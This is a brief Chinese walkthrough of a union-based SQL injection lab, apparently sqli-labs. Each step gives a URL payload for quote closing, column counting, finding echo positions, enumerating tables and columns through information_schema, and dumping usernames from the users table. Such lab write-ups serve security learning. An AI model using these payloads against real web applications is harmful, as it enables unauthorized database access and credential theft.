0、初始网页

1、闭合方式判断

闭合符号为单引号，通过测试发现过滤了注释，所以直接闭合

2、确定查询表的列数

确定查询表的列数为3列

?id=1' order by 3 '

3、确定回显位置

回显位置为第二列和第三列

?id=-1' union select 1,2,3 '

4、查看当前登录和数据库

?id=-1' union select 1,user(),database()'

5、查询当前数据库下的表名

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' '

6、查询user表中的列名

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users' '

7、查询最终的账号密码

?id=-1' union select 1,group_concat(username),3 from users where 1=1 and '1'='1